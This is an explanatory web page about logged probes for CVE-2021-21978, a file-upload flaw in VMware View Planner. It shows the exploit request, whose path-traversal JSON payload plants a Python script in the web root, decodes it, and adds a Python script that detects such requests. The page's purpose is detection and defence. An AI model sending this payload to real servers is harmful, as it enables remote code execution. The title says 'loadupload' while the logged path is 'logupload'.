What is loadupload?logMetaData?

Created 23rd January 2024
Updated 23rd January 2024

CVE-2021-21978

Requests of this nature are probing for a vulnerability in VMware View Planner 4.x: an unauthenticated file upload that allows remote code execution.

The full URI and query used against this server is shown below. A URL-encoded JSON blob is assigned to the logMetaData parameter in an attempt to exploit an unauthenticated endpoint.

/logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D

| Encoded/Logged | Decoded |
| --- | --- |
| %7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D | {"itrLogPath": "../../../../../../etc/httpd/html/wsgi_log_upload", "logFileType": "log_upload_wsgi.py", "workloadID": "2"} |
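For triaging these requests in your own access logs, the following is an added example (not code from the original page or from VMware) that decodes the logMetaData parameter and reports why a request looks like this probe. It matches on the parameter name rather than the path; the function name, the two heuristics and every sample URI except the first are assumptions made for the example.

```python
import json
from urllib.parse import parse_qs, urlsplit

# Sample request URIs: the first is the one logged on this page, the rest are constructed.
SAMPLE_URIS = [
    "/logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D",
    "/logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22run1%22%2C%20%22logFileType%22%3A%20%22agent.log%22%2C%20%22workloadID%22%3A%20%222%22%7D",
    "/logupload?logMetaData=%7Bnot-json",
    "/index.html",
]

def inspect_uri(uri):
    """Return None when there is no logMetaData parameter, else a finding dict."""
    parts = urlsplit(uri)
    values = parse_qs(parts.query).get("logMetaData")  # parse_qs percent-decodes the value
    if not values:
        return None
    finding = {"path": parts.path, "decoded": values[0], "reasons": []}
    try:
        meta = json.loads(values[0])
    except json.JSONDecodeError:
        finding["reasons"].append("logMetaData is not valid JSON")
        return finding
    if not isinstance(meta, dict):
        finding["reasons"].append("logMetaData is not a JSON object")
        return finding
    # Heuristic 1 (assumption): a log path should never climb out of its directory.
    log_path = str(meta.get("itrLogPath", "")).replace("\\", "/")
    if ".." in log_path.split("/"):
        finding["reasons"].append("itrLogPath contains parent-directory segments")
    # Heuristic 2 (assumption): an uploaded "log" named as a Python script is suspect.
    if str(meta.get("logFileType", "")).lower().endswith(".py"):
        finding["reasons"].append("logFileType names a Python script")
    return finding

if __name__ == "__main__":
    for uri in SAMPLE_URIS:
        result = inspect_uri(uri)
        if result and result["reasons"]:
            print(result["path"], result["decoded"], result["reasons"])
```

A finding with an empty reasons list means the parameter was present but neither heuristic fired; requests like that may still deserve review on a host that does not run View Planner at all.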

References

  1. https://attackerkb.com/topics/84gfOVMN35/cve-2021-21978
  2. https://gist.github.com/nathanqthai/197b6084a05690fdebf96ed34ae84305
  3. https://twitter.com/wugeej/status/1369476795255320580?lang=en-GB
  4. https://www.vmware.com/security/advisories/VMSA-2021-0003.html

Other known request paths

  1. loadupload?logMetaData